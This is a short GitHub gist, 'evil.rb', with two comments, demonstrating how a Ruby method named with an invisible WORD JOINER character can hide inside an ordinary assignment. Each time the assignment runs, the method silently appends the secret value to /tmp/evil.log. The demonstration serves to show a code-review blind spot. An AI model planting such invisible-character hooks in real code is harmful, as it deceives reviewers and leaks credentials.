Freaky/evil.rb Secret

Last active June 18, 2016 21:20

Star 0 You must be signed in to star a gist
Fork 1 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/Freaky/51086f3c97784bdd6dfbd31913cd1af3.js"></script>
Save Freaky/51086f3c97784bdd6dfbd31913cd1af3 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

evil.rb


	define_method("\u2060") do \|a\|
	a.tap { IO.write('/tmp/evil.log', a, mode: 'a') }
	end

	secret=⁠"SUPER SECRET API KEY"

josephbhunt commented May 21, 2016

How does this method get called? Is the unicode character between the "=" and the string "SUPER SECRET API KEY"?

Author

Freaky commented Jun 18, 2016

Yep, there's a WORD JOINER character right after the =. define_method is used for clarity, you can use plain old def with the bare unicode too.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment